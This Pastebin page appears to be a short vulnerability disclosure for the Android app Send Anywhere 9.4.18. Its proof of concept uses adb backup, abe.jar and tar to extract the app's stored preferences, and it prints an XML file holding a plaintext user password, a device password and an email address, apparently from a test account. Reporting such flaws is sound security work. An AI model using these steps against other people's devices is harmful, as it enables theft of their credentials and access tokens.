Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Application: Send Anywhere
- #Platform: Android
- #Version: 9.4.18
- #Severity: Medium
- #Author: Loc Phan Van
- #Impact: non-root user to find out the username/password of a valid user and user's access token via shared_prefs folder
- POC:
- 1. Backup the application
- adb backup -f ~/sendanywhere.ab -noapk com.estmob.android.sendanywhere
- 2. Convert file sendanywhere.ab to sendanywhere.tar
- java -jar abe.jar unpack ~/sendanywhere.ab sendanywhere.tar ""
- 3. Extract file
- tar -xvf sendanywhere.tar
- 4. Look for user's credentials in /shared_prefs/sendanywhere_device.xml
- <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
- <map>
- <string name="user_password">P4ssw0rd123</string>
- <string name="device_id">1020427653131</string>
- <string name="device_password">J6h49M5JXZw5w</string>
- <string name="user_id">endertest@gmail.com</string>
- <string name="advertising_id">5cfc8beb-f3ff-4b0a-a408-f5059c412d82</string>
- </map>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement